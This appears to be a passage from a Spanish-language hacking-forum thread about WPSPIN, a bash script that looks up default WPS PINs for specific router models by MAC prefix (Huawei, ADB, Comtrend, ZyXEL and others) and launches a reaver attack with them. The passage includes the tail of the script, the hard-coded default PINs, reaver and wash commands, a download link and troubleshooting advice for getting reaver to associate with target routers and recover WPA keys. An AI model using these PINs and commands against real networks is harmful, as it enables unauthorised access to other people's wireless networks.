  PIN4REAVER=${PINWPS[1]}
  ;;
  001915)
  echo -e "\n              modelo routeur   : OBSERVA TELECOM, AW4062\n"
  echo -e "              PIN GENERICO  > 12345670\n"
  PIN4REAVER=12345670
  ;;
  404A03)
  echo -e "\n              modelo routeur   : ZYXELL P-870HW-51A V2\n"
  echo -e "              PIN GENERICO  >  11866428\n"
  PIN4REAVER=11866428
  ;;
  F43E61)
  echo -e "\n             modelo routeur  : Encore ENDSL-4R5G de OEM Shenzhen Gongjin Electronics\n"
  echo "             PIN GENERICO  >  12345670\n"
  PIN4REAVER=12345670
  ;;
  001FA4)
  echo -e "\n            modelo routeur   : Encore ENDSL-4R5G de OEM Shenzhen Gongjin Electronics\n"
  echo -e "            PIN GENERICO  >  12345670\n"
  PIN4REAVER=12345670
  ;;
  001A2B)
  echo -e "\n             modelo routeur   : Comtrend Gigabit 802.11n\n"
  echo "             PIN GENERICO  >  88478760\n"
  PIN4REAVER=88478760
  ;;
  3872C0)
  echo -e "\n             modelo routeur  : Comtrend AR-5387un\n"
  echo "             PIN GENERICO  >    18836486\n"
  PIN4REAVER=18836486
  ;;
  3039F2)
  echo -e "\n             modelo routeur  : PDG-A4001N de ADB-Broadband\n"
  echo "             PINes GENERICOs  >  16538061  "
  echo "                              >  18355604  "
  echo "                              >  88202907  "
  PIN4REAVER=16538061
  ;;
  DC0B1A)
  echo -e "\n            modelo routeur  : PDG-A4001N de ADB-Broadband\n"
  echo "            PINes GENERICOs  >  16538061  "
  echo "                             >  18355604  "
  echo "                             >  88202907  "
  PIN4REAVER=16538061
  ;;
  *)
  echo -e "\n          PIN WPS POR DEFECTO >>>>   ${PINWPS[1]} \n"
  PIN4REAVER=${PINWPS[1]}
  ;;
  esac
fi

echo "---------------------------------------------------------------------"
echo -e "\n[*] Elegir una opción.
   1 > Atacar con reaver (con mode monitor ya activado en mon0)
       El PIN empleado será $PIN4REAVER
   2 > Probar otra red
   3 > Salir
"
read -ep "Entrar número opción y darle a <ENTER> : " CHOISE

case $CHOISE in
1)
sudo reaver -b $BSSID -p $PIN4REAVER -i mon0 -t 2 -vv
;;
2)
./WPSPIN.sh
;;
*) echo "Saludos de kcdtv y r00tnull :p"
sleep 1
exit
;;
esac
Descarga del source: https://anonfiles.com/file/76dd437120fdb486f180b65ed1f459e3

kcdtv no me importaría colaborar con usted en este proyecto, me parece una buena iniciativa :).
Saludos.
gracias compi por el esfuerso lo he probado ,y da los pines correctos y a la hora de probar con el reaver va probando y de repente desaparece  :o a lo mejor le falta algunos retoques ,de momento me quedo con el actual de kcdtv un salu2 ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: atim en Diciembre 29, 2012, 02:17:23 am
Citar
Publicado por: r00tnull    Hola he hecho algunas optimizaciones, espero que les sirva :).
Puedes decirnos cuales son esas optimizaciones ?

   Un saludo.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: r00tnull en Diciembre 29, 2012, 02:47:33 am
Bueno quería aclarar que no quiero que se elija entre usar un script u otro. Si hubiese querido crear una versión totalmente nueva hubiese hecho muchos más cambios. Pero como comento en el script, he intentado respetar el nombre de las variables y los textos, para que kcdtv pueda revisarlo con mayor rapidez y así implementar las mejoras si lo cree conveniente.
No es cuestión de separar si no de unir fuerzas para el bien común :).
Las optimizaciones que he hecho estan comentadas en el código, en el changelog de arriba.

- Añadido opción -e a los reads para que sea interactivo, se pueda editar el texto que ponga el usuario, etc.
- Eliminación de algunas variables que no hacían falta.
- Simplificación de la función que genera el checksum.
- Simplificación de los `echo' que engloban varias lineas. Nota: no hace falta poner un echo por cada línea.
- Añadida verificación de MAC válida, y de ESSID FTE-XXXX, sin que se pueda bypassear.
- Agrupación de mac's para FTE en el `CASE'.
- Otros pequeños cambios.

Son mejoras respecto al código, el programa va a seguir haciendo lo mismo :p, pero la detección de errores esta mejorada, y se ha reducido el número de comprobaciones, con lo cual es más rápido. Vamos lo que viene siendo optimizar :).

A partir de lo que ya hay en el script se pueden implementar muchas más cosas, alguna opción para poder cambiar la tarjeta a modo monitor desde el propio script, o para los que no tengáis instalado el reaver (make install), pero si lo tenéis compilado (make), que podáis especificar la ruta al binario.

Saludos.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: atim en Diciembre 29, 2012, 02:59:35 am
Vale, muchas gracias por la explicación y por las mejoras. Todo lo que sea mejorar siempre es bienvenido, siempre se ha dicho que cuatro ojos ven mas que dos aunque los mios de código de programación ven poco je. je...

   Un saludo.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 29, 2012, 05:12:57 am
¡Epa! Espero que habéis tenido muy buenas navidades y que el papa nöel les haya traído un alienware.
A mi no.  :P
@ jonhy_1988
Backtrack se basa en Ubuntu. Ubuntu se basa en debian y gasta paquetes ".deb".
Tienes muchas distribuciones que se basan en debian: linux Mint, Xubuntu... En este tipo de distribuciones "sudo" sirve para atribuir derechos de administrador en consola.
No es así en todas las distribuciones linux
Xiaopan utiliza otros paquetes  y no creo que reconozca "sudo", arch linux otro etc...
En fin, linux es una base, un núcleo base que permite el desarrollo  a coste cero y libre de millones de movidas desde android hasta backtrack pasando por servidores, supercomputadoras,
Una distribución es solo una manera de aglutinar y hacer funcionar juntos para una meta miles de elementos distintos.
Bash es una consola UNIX que encuentras en linux y mac os , así que un script en bash te puede funcionar en todos lugares (incluido windows con cygwin), lo que pasa es que la sintaxis de todos los ordenes no es la misma en todas las distribuciones.
En la capture de pantalla te dice que no te reconoce "sudo" en linea 432.
 abres WPSPIN.sh con Kedit, quitas, el "sudo" en el script (linea 432) y guardas los cambios y debería funcionarte (por lo menos las 431 lineas precedantes van bien y queda muy poco  ;D

Citar
case $CHOISE in
1)
sudo reaver -b $BSSID -p $PIN4REAVER -i mon0 -t 2 -vv

de paso veo que el PIN no es igual que el del script (188...)

(http://.us/photo/my-images/805/pruebasg.jpg/)

Sería muy bien si podrías mandarme los datos bien completos, con la versión del firmware y el serial para que podamos ver mejor que pasa porque tengo datos de otro routeur dónde el PIN es diferente también lo que no los tengo bajo los ojos y no me recuerdo si es el mismo pin.

@ abuabdellah
Interesante esto del rtl8189, a ver si los reyes...  :P
El script solo llama el reaver instalado, no lleva nada que modifique el reaver que esta instalado.  ;)

@  r00tnull
Antes de todo muchas gracias por el interés   :)
En xubuntu 12.10 me salen estos pequeños errores tanto con el código directamente copiado / pegado desde el post que descargando el código

Código: [Seleccionar]
+---------------------------------+
|   Basada en WPSPIN de kcdtv.    |
| Respetando la licencia GPLv3.   |
| Usado algoritmo de ZaoChunsheng |
+---------------------------------+

WPSPIN_by_r00tnull.sh: 22: read: Illegal option -e
WPSPIN_by_r00tnull.sh: 23: read: Illegal option -e
WPSPIN_by_r00tnull.sh: 26: WPSPIN_by_r00tnull.sh: [[: not found
WPSPIN_by_r00tnull.sh: 44: WPSPIN_by_r00tnull.sh: [[: not found
WPSPIN_by_r00tnull.sh: 57: WPSPIN_by_r00tnull.sh: declare: not found
WPSPIN_by_r00tnull.sh: 1: WPSPIN_by_r00tnull.sh: arithmetic expression: expecting EOF: "0x%10000000"
WPSPIN_by_r00tnull.sh: 65: WPSPIN_by_r00tnull.sh: PINWPS[1]=00000000: not found
WPSPIN_by_r00tnull.sh: 1: WPSPIN_by_r00tnull.sh: arithmetic expression: expecting EOF: "0x%10000000"
WPSPIN_by_r00tnull.sh: 65: WPSPIN_by_r00tnull.sh: PINWPS[$[1+1]]=00000086: not found
WPSPIN_by_r00tnull.sh: 1: WPSPIN_by_r00tnull.sh: arithmetic expression: expecting EOF: "0x%10000000"
WPSPIN_by_r00tnull.sh: 65: WPSPIN_by_r00tnull.sh: PINWPS[$[$[1+1]+1]]=00000147: not found
WPSPIN_by_r00tnull.sh: 124: WPSPIN_by_r00tnull.sh: Bad substitution
kcdtv@Nosystem:~/Descargas$

¿Que distribución usas / versión de bash?

Se agradece muchísimo tu código explicado y es de puta madre.  ;)
Lo que pasa es que ya tenía hecho una depuración y reescrito el código pero de forma  distinta generando 4 strings y seguido por un
Código: [Seleccionar]
for i in y pum, 6 kb.
Tu forma será mejor lo que como ya esta hecho esto de depurar y simplificar el código y quitar repeticiones hecho ahora me voy a quedar con lo que hecho y seguir investigando otras cosas respecto al script.
también hay cosas que declaro en vista de futuras funciones pero si no haces telepatía no lo puedes adivinar y tambien paranoias mias que aparecen en medio camino
- Agrupación de mac's para FTE en el `CASE'
si,, he hecho unos copy-paste muy guarrrrrrrros  pero es por si acaso se ha de modificar el affichage en salifda para un solo bssid pero quizas no tiene ninguno sentido porque nunca sirva... pero a lo mejor si.
- El checksum, quiero dejar la comprobación para futuras funciones, también hace falta hacer lo así, emplear la reducción por modulo en base 10 dígito después dígito para algunos bugs que pueden surgir con valores inferiores a 1000000 y no hay que quitar el zero-paddibng sino la cagamos en salida o es que no he bien visto todo lo que has hecho.
pero en lugar del if fi hacer algo asi
Código: [Seleccionar]
PINWPS=$(printf '%08d\n' $PIN)aunque estéticamente me gustaba con el if fi  ;D
- Añadida verificación de MAC válida, y de ESSID FTE-XXXX, sin que se pueda bypassear.
esto esta bien en si pero me gustaría mas trabajar con salidas de escaneo wps directo, lo que walsh no es lo mejor o del todo perfecto.
ahora es ver cual es la forma la mas puntual d efectuar un escaneo wps y encontrar la forma adecuada de trabajar con la salida,
- Simplificación de los `echo' que engloban varias lineas. Nota: no hace falta poner un echo por cada línea.
es que uso gedit y me va bien visualizar con columnas de colores  :P  si es algo raro  :P
-  Añadido opción -e a los reads para que sea interactivo, se pueda editar el texto que ponga el usuario, etc.
esto no lo pillo y me da un error justamente acerca de este -e y sin este -e me deja editar mi texto en el read...
pero tampoco importa mucho porque tiene vocación a desaparecer aunque me gustaría saber porque me da error tu sintaxis.   ???
viva bash  ;D
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: r00tnull en Diciembre 29, 2012, 15:49:50 pm
@kcdtv
Los errores que le salen de sintaxis es por que lo ejecuta con `sh WPSPIN.sh' y ahi no esta usando el bash por mucho que en el script arriba este la #!/bin/bash, estas usando `sh' que obviamente no soporta esa sintaxis :p.
La solución seria o ejecutarlo como `bash WPSPIN.sh' o simplemente le da permisos de ejecución y lo lanzas con ./WPSPIN.sh .

Lo del checksum primero decir que nada mas verlo se nota que ha habido una buena currada ahi :p, pero la verdad teniendo ya el bucle que hace el amigo ZaoChunsheng, no creo que fuese necesario complicarse tanto, habría que revisar el bug que comenta, aunque no lo veo claro.

El padding de ceros si esta, por ejemplo:  PINWPS4=`printf "%07d%d" $STRING $CHECKSUM` , siete espacios para el string inicial y uno de checksum.

Lo de la mac válida creo que es imprescindible verificar que el usuario a introducido los datos correctos, en este caso una dirección MAC correcta (6 pares hexadecimales separados por ':' ), y en el caso de las FTE-XXXX que de verdad sea un ESSID correcto (FTE- +4 digitos hexadecimales), por que si no pueden pasar cosas como esta:
Código: [Seleccionar]
   >    Pegar el Essid y darle a <Enter>: FTE--asdasd

   >    Pegar el Bssid y darle a <Enter>: 00:11:22:33:44:55

                                   
         PIN WPS POR DEFECTO >>>>  00000581 
ó
Código: [Seleccionar]
   >    Pegar el Essid y darle a <Enter>: FTE-w543

   >    Pegar el Bssid y darle a <Enter>: 00:11:22:33:44:55

./WPSPIN.sh: línea 207: printf: 0x33w543: número hexadecimal inválido
                                             
         PIN WPS POR DEFECTO >>>>  00000581 
ó
Código: [Seleccionar]
    >    Pegar el Essid y darle a <Enter>: vodafonealgo

   >    Pegar el Bssid y darle a <Enter>: 28:5F:DB:00:11

        ¡ el ESSID por DEFECTO es FTE-XXXX !

           3 PINes POSSIBLES  >  00000178 
                              >  00000253 
                              >  00000314 

Ya se que la culpa la tiene el usuario por meter datos que no son :p, pero no estaría demás que detectará los errores, aún cuando la salida sea de escaneos de wps directos :). Además siempre viene bien dejar una opción para que el usuario pueda meter los datos manualmente.

Ahh, lo de los -e es para que se puedan editar los datos que introduces, sin la -e, si quieres cambiar algún valor de los que has puesto no te puedes mover hasta ese valor en concreto, tienes que borrar todo hasta llegar a él. Con la -e puedes moverte sin problemas con las flechas por el texto que has pegado.

Nada más, solo quería ayudar en lo que pueda, pero bueno cada uno es libre de hacer el código como quiera, de eso se trata la programación :p, aunque creo que muchas veces hay que sacrificar la estética por la efectividad ;).

Saludos.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Diciembre 29, 2012, 19:35:51 pm
Cita de: r00tnull
Lo de la mac válida creo que es imprescindible verificar que el usuario a introducido los datos correctos

Cita de: r00tnull
Ya se que la culpa la tiene el usuario por meter datos que no son
Buenas..

Personalmente es algo en lo que estoy totalmente de acuerdo y es por eso que PINwps 'GUI está creada así.. comprueba longitud del ESSID / BSSID, caracteres HEX, separadores etc con el objeto de que el programa en si no corra si escribe un dato erróneo en los campos que el usuario debe rellenar y que esto tenga por consecuencia que se devuelva un PIN incorrecto.

Además si se comente un error se avisa mediante un msj. indicando que y donde se encuentra.   ;)

Ahora pasadas las fiestas y publicadas ya dos versiones como pruebas de concepto en todas las apllicaciones linux / windows se puede trabajar con mas calma perfeccionándolas.

Saludos.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 29, 2012, 20:20:05 pm
Le veo un problema al poner un filtro essid de este tipo y a este momento:  impide que se siga adelante con el modo essid desconocido en el caso de que el essid FTE haya sido modificado añadiendo o quitando unos dígitos  en la parte derecha del essid utilizando ":" como marcador, es una posibilidad que no se debe impedir.  ;)
como dije ya tengo hecho fase de depuración y escritura y nuevas funciones hacen que el código de rootnull no me sirve y me costaría más ir con el código de rootnull que habría que retocar que con lo que tengo bajo el brazo que esta hecho a medida de las necesidades futuras del tool... no es que no se agradece el interés.  ;)

Código: [Seleccionar]
  >    Pegar el Essid y darle a <Enter>: vodafonealgo

   >    Pegar el Bssid y darle a <Enter>: 28:5F:DB:00:11

        ¡ el ESSID por DEFECTO es FTE-XXXX !

           3 PINes POSSIBLES  >  00000178 
                              >  00000253 
                              >  00000314

pues esto es lo esperado y lo que hay que hacer porque el bssid es de un hg532c y no sabiendo el essid se ha de devolver 3 pines  ;)

y por los dos errores anteriores, lo mismo, si pones un bssid irealista con FTE inclues un fallo conceptual.... no existen en la realidad un routeur fte con bssid 00:11:22:  ;)




 
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Diciembre 29, 2012, 20:32:35 pm

Creo que eso del fitro ESSID se puede apañar, si no es para esta para otra versión.. ya hablamos con calma estos días.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 29, 2012, 21:14:34 pm
No es nigun problema maripuri   ;)
el codigo esta ya revisado y no es como este.... ya sabes que prisa mata y la cosa saldrá de mi lado cuando este lista y no será mañana...
El script tal cual es funcional si se sigue las instrucciones de copiar y pegar, no me interesa mucho introducir estas reglas porque en el código nuevo no serán útiles.... 
pero esto de sacar una versión nueva será mas adelante porque me queda mucho trabajo para lograr mis objetivos, no es el aspecto programación que me preocupa, esto sale de si sobre la marcha y luego se buscan los eventuales bugs, no, son otras movidas... tomará su tiempo esto esta claro pero valdrá la pena, esto espero 

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: r00tnull en Diciembre 29, 2012, 21:45:13 pm
@kcdtv
  Mmmh no es así :p, de hecho el filtro que puse para el essid FTE-XXXX es para que se lleve a cabo (o no) el método especifico para ese ESSID, para que nos entendamos el método que genera el PIN que guardas en la variable $PINWPS4 . Si el usuario introduce cualquier otro ESSID se llevará a cabo la generación de los 3 PINS.

  Si lo que quiere es dejar pasar a todos los ESSID's que empiecen por FTE-, aún así necesita verificar que los demás dígitos sean hexadecimales ;).

  En el ejemplo 1 le he demostrado como introduciendo un essid FTE no valido, su script lo toma como verdadero ya que solo chequea que empiece por FTE y lleva a cabo la generación del PIN4, mostrando el resultado.

  En el ejemplo 2 he introducido un cambio, he añadido un dígito no hexadecimal, tu script aún así sigue detectándolo como un essid FTE válido, produciendo un error al intentar pasar el valor a int, siguiendo con la generación del PIN 4.

  Lo que le quiero decir, los 2 primeros ejemplos no es problema del BSSID, puedes poner BSSID's verdaderos y seguiría pasando lo mismo ya que usa parte del ESSID para generar el PIN 4.

  Respecto al ejemplo 3, si se da cuenta introduje un BSSID con 5 pares en vez de 6, y aún así continua generando los 3 PIN's y dando un resultado :p.

  Espero que no se este tomando mis comentarios a mal, solo intento ayudar a mejorar el código :). Imagino que en nuevas versiones hará cambios. Si no se controla lo que introduce el usuario, se puede llegar a inyectar código, que podría generar un segmentation fault o crashear el sistema. Lógicamente como este programa no usa recursos online no es peligroso ya que uno mismo no se va a hacer eso :p pero es bueno acostumbraste :).

Saludos, y no se confíe del usuario, nunca se sabe lo que hará :p.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Diciembre 29, 2012, 21:48:52 pm

Visto.. no estaba atendiendo al foro, disculpad voy a probar unas cosas en otro PC y lo dicho después de las fiestas revisamos todo lo que haya que revisar.   Saludos.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Diciembre 29, 2012, 21:57:40 pm
No me lo tomo a mal  ;)
Gracias para todos los consejos muy interesantes y útiles para tod@s en la redacción de nuestr@s script; es siempre interesante hablar de script y dar trucos, así que gracias antes de todo  :)
tomare en cuenta tus sugerencias, no lo dudes y con los créditos debidos si uso partes de tu código que es de puta madre en si  ;)

[time]Diciembre 30, 2012, 00:18:28 am[/time]
Estoy "jugando" con tu mod y la mejora del filtro essid esta muy bien, lo emplearé  ;)
La función comprobación filtro bssid me parece redundante si se usa la salida de un scan pero es bueno tener la para otras circunstancia  ;D
La regla del checksum tal que la has hecho va bien también y el zero-padding esta bien en su sitio, se me cruzaban los ojos ayer a estas horas  ::)  :P
Eres una maquina  ;D

Citar
ya el bucle que hace el amigo ZaoChunsheng, no creo que fuese necesario complicarse tanto, habría que revisar el bug que comenta, aunque no lo veo claro.
no es el que hace zaochesung, no lo he utilizado porque no sabía al incio de que zaochesung había encontrado el algoritmo con routeurs tenda así que lo que ha hecho antares_145 es adaptación de formula C que dan en la wifi alliance, la pille sobre el foro de CISCO, para generar y comprobar el checksum.
ahora tu simplificación para la generación es perfectamente valida y mucho mas corta, no hay dudas en ello  ;)
la comprobación la deje porque quería dejarla también es innecesaria si se calcula bien el checksum y se hace bien el zero-padding, pero me pareció bien dejarla para usarla yo o otros en otro contexto.

Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: jonhy_1988 en Diciembre 30, 2012, 09:48:53 am
Gracias por la info kcdtv, probare el script con tus indicaciones pero ya despues de año nuevo y cuando tenga tiempo te pasare todos los datos de mi router ya que si es verdad que el pin que lleva por defecto no es el que da la aplicacion,cuando tenga un hueco recopilare todos los tados y te los mando por privado.Me alegra que el hilo este cogiendo vida...jajaj. Saludos a todos....
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: haroll en Enero 03, 2013, 11:19:43 am
Hola,tenia una consulta no se si va en este hilo,pero como no sabia donde postearlo.Maripuri si lo ves que es de otro sitio muevelo,pero porq pasa que aveces con el pin de WPSLINUX y WPSPINguiv2 me crackea el pin pero no me devuelve la clave!???pone pin cracked el tiempo tardado pero no devuelve la PSK.Gracias
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Enero 03, 2013, 11:26:54 am

La(s) herramienta(s) de Windows devuelven el PIN solamente, en cuanto al script de linux algo te dirán los moderadores o usuarios de linux.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: haroll en Enero 03, 2013, 11:47:09 am
no si yo apunto el pin en papel,y luego utilizo w****3.x con reaver y el comando reaver -i mon0 -b XX:XX:XX -cX -pXXXXXX -vv es posible que no sea el pin correcto!??porque ya m ha pasado varias veces.gracias
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: maripuri en Enero 03, 2013, 11:52:55 am

Ya te comenté que para temas de linux te responderán los moderadores o los usuarios.. yo no toco linux. Por otra parte a ver si nos vamos acostumbrando a no tratar de saltarse las restricciones del foro usando asteríscos.. o lo que sea:


Lee las normas
Citar
Leete las NORMAS antes de preguntar ¿Por que?


Luego llegan las "sorpresas".. pero no serán por lo avisados que estáis. Mas alto se pude decir, mas claro NO.
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 03, 2013, 16:53:28 pm
¿Que tipo de mac es?
¿Que tipo de bssid?
¿Tienes un M6?
Pon una captura de pantalla editada o has un copiado/pegado de lo que pasa exactamente en consola.  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: haroll en Enero 08, 2013, 13:11:22 pm
No pasa nada raro,lo unico es eso.Q si q parece q crackea el pin,es igual que cuando saca la clave,pero sin mostrarla en pantalla,yo pienso que puede ser porq no esta bien el pin completo solo la mitad q opinas,!?si aun necesitas la caputra de pantalla tendre q esperar aver si encuentro el live cd.Gracias
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 08, 2013, 15:38:49 pm
Es imprescindible que pongas capturas de pantalla y copiado-pegado de los ordenes usados y mensajes de errores
Es imprescindible que pongas una captura de pantalla de airodump-ng con filtro canal y bssid
Tampoco respondes a ninguna de mis preguntas
Citar
¿Que tipo de mac es?
¿Que tipo de bssid?
¿Tienes un M6?
¿Y que versión y revisión de reaver usas?
Hasta que no expongas tu problema dando los elementos necesarios a cualquier incio de respuesta no se te podrá decir nada.
Son tres· mensages en los cuales no das nada de nada de información  :P
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: totstar en Enero 08, 2013, 21:18:03 pm
Buenas, voy a ver que puedo hacer tengo el wpspin instalado pero no se si he de actualizar algo por que es el que viene por defecto en bugtraq2 beta (no es el foro linux y por lo que pone en las normas no hay problema en mencionarlo, no?)

y por otro lado poseo una de las macs afectadas en un fte-xxxx y me da el pin por defecto pero al atacarme con el reaver no hay manera de que se asocie o no hace nada o da lo de los 25 fallos, la intensidad de la señal es del 80% por lo que ese no es el problema y me gustaria saber si es que mi router se ha protegido o algo como he de comprobarlo.

He leido bastante pero soy nuevo en esto y vengo de pregunton tenedme un poco de paciencia y si tengo que borrar algo de mi post ahora lo miro cuando envie el mensaje pero no me baneeis :elrisas:

Gracias

Edito: es el tuyo

Citar
   \033[31m                ((_)()\ )  /(_))/(_))/(_))/(_))((_)    \033[0m
   \033[31m                _(())\_)()(_)) (_)) (_)) (_))   _((_)  \033[0m
   \033[33m                \ \((_)/ /| _ \/ __|| _ \|_ _| | \| |  \033[0m
   \033[33m                 \ \/\/ / |  _/\__ \|  _/ | |  | .  |  \033[0m
   \033[33m                  \_/\_/  |_|  |___/|_|  |___| |_|\_|  \033[0m kcdtv para
                                         
                                                               
www.lampiweb.com                                             www.crack-wifi.com

                             PIN WPS por defecto
\033[32m-------------------------------------------------------------------------------\033[0m

FTE-XXXX                              \033[32m > \033[0m              Huawei  HG 532c-EchoLife
(*)vodafoneXXXX                       \033[32m > \033[0m                        Huawai  HG556a
(*)belkin.XXX                         \033[32m > \033[0m                      F9K1104, F5D8231
(*)Belkin_N+_XXXXXX                   \033[32m > \033[0m                               F5D8235
(*)WLAN-XXXX                          \033[32m > \033[0m                  Teldat iRouter1104-W
(*)ZyXEL                              \033[32m > \033[0m                        zyxel NBG-419n

(*)Algoritmo similar al descubierto por Zaochesung(routeur Tenda W309R)
\033[32m-------------------------------------------------------------------------------\033[0m


   >    Pegar el Essid y darle a <Enter>: FTE-XXXX

   >    Pegar el Bssid y darle a <Enter>: B4:74:9F:XX:XX:XX

                                           
         PIN WPS POR DEFECTO >>>>  23479395

\033[32m-------------------------------------------------------------------------------\033[0m

elegir una opción


   1 \033[32m > \033[0m atacar con reaver (con mode monitor ya activado en mon0)

   2 \033[32m > \033[0m probar otra red

   3 \033[32m > \033[0m salir


entrar numero opción y darle a <Enter> : 1
[sudo] password for bugtraq:

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[-] Failed to retrieve a MAC address for interface 'mon0'!
Bugtraq@II Beta WPSPINes$

En los otros programas parecidos me falla diferente
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 08, 2013, 22:56:24 pm
No sabía que estaba integrado en bugtraq2... veo que usaron la primera versión por el bug en salida en consola.
Si actualizas con la versión genérica tendrás ademas los pines genéricos, sobre un routeur como el ADB broadaband PDG4100ND (WLAN_XXXX, movistar HOme station internet + 3 G, un routeur bien potente con buena señal) es RADICAL  ;)
aqui wpspin ultima versión con reaver 1.3 vs un PDG4100ND

(http://i.imm.io/P7ll.png)

(http://i.imm.io/P7nR.png)

Citar
y por otro lado poseo una de las macs afectadas en un fte-xxxx y me da el pin por defecto pero al atacarme con el reaver no hay manera de que se asocie o no hace nada o da lo de los 25 fallos, la intensidad de la señal es del 80%

¿el 80% de que? ¿Quien te dice 80%?
A mi ubuntu me dice 45% y es más de 80% de que por ejemplo la utilidad realteck bajo windows ....
Las cosas se miden con el PWR y RXQ de airodump-ng y cuando se necesita 100 de RXQ no te vale con 80.
Además cada chipset tiene sus historias y detalles....
Si reaver no asocia, no asocia y que tengas el PIN bueno por defecto no te va a servir de nada hasta que reaver consiga mandar el PIN entero y recibir la llave WPA.
cómo puedes ver más abajo usando WPSPIN y reaver 1.4 ultima revisión obtenida desde svn (cuidado con la 1.4 normal, tiene bug con el opción -p ) , de m1 a m7 plus 2 WSC NACK>

(http://i.imm.io/Sbp5.png)



Código: [Seleccionar]
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[-] Failed to retrieve a MAC address for interface 'mon0'!
Bugtraq@II Beta WPSPINes$

aqui parece que no estas en mode monitor  ;)
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: totstar en Enero 09, 2013, 00:19:20 am
No sabía que estaba integrado en bugtraq2... veo que usaron la primera versión por el bug en salida en consola.
Si actualizas con la versión genérica tendrás ademas los pines genéricos, sobre un routeur como el ADB broadaband PDG4100ND (WLAN_XXXX, movistar HOme station internet + 3 G, un routeur bien potente con buena señal) es RADICAL  ;)
aqui wpspin ultima versión con reaver 1.3 vs un PDG4100ND

Voy  a ver si consigo actualizar, bueno por lo menos he hecho que te enteraras que estabas en bugtraq

Citar
¿el 80% de que? ¿Quien te dice 80%?
A mi ubuntu me dice 45% y es más de 80% de que por ejemplo la utilidad realteck bajo windows ....
Las cosas se miden con el PWR y RXQ de airodump-ng y cuando se necesita 100 de RXQ no te vale con 80.
Además cada chipset tiene sus historias y detalles....
Si reaver no asocia, no asocia y que tengas el PIN bueno por defecto no te va a servir de nada hasta que reaver consiga mandar el PIN entero y recibir la llave WPA.
cómo puedes ver más abajo usando WPSPIN y reaver 1.4 ultima revisión obtenida desde svn (cuidado con la 1.4 normal, tiene bug con el opción -p ) , de m1 a m7 plus 2 WSC NACK>

82% me dice el WICD, pero lo mirare con airodump que entiendo que tienes toda la razon por que el de windows infla bastante la intensidad de la señal


Citar
aqui parece que no estas en mode monitor  ;)


Fail mio pero cuando me pongo en monitor (o eso creo) me hace lo de:

Citar
  • Waiting for beacon from B4:74:9F:XX:XX:XX
  • Switching mon0 to channel 1
  • Switching mon0 to channel 2
  • Switching mon0 to channel 3
  • Switching mon0 to channel 4
  • Switching mon0 to channel 5
  • Switching mon0 to channel 6
  • Switching mon0 to channel 7
  • Switching mon0 to channel 8
  • Switching mon0 to channel 9
  • Switching mon0 to channel 10
  • Switching mon0 to channel 11
  • Switching mon0 to channel 12
  • Switching mon0 to channel 13
  • Switching mon0 to channel 14
  • Switching mon0 to channel 1
  • Switching mon0 to channel 2
  • Switching mon0 to channel 3
  • Switching mon0 to channel 4
  • Switching mon0 to channel 5
  • Switching mon0 to channel 6
  • Switching mon0 to channel 7
  • Switching mon0 to channel 8
  • Switching mon0 to channel 9
  • Switching mon0 to channel 10
  • Switching mon0 to channel 11
a los dos años

Citar
  • Associated with B4:74:9F:XX:XX:XX (ESSID: FTE-XXXX)
y ahi se queda


Gracias por tu respuesta tan rápida, a ver si la asimilo y me encamino xD
Título: Re:WPSPIN - script ataque WPS con generador PIN por defecto - belkin/Huawei etc
Publicado por: kcdtv en Enero 09, 2013, 00:39:50 am
Ni asocias  :-\ .... 80% en WCID deberían ser suficiente
Fijate bien que no haya trafico y clientes asociados.
Fijate que el wps no haya sido desactivado,
Porque que reaver ni se parre un segundo en el canal del routeur, esto no debería pasar aunque este la señal muy baja (y no es el caso porque WCID es más bien del palo de poner te 50% para una señal ya muy muy decente)
No es nada normal que con tal señal ni "vea" tu objetivo
Código: [Seleccionar]
sudo wash -i mon0 -C
Coeman o gladiator no me reuerdo quien de los dos, insisto hace poco en que para unos bssid FTE-XXXX era necesario usar wps reaver 1.3...

el comando reaver de wps pin lleva un poco mas de delay que  por defecto porque note que unos routeurs no te deban el M6 y M7 si no esperabas más de los 0.25 segundos que hay por defecto entre peticiones entre primera y segunda mitad de PIN.
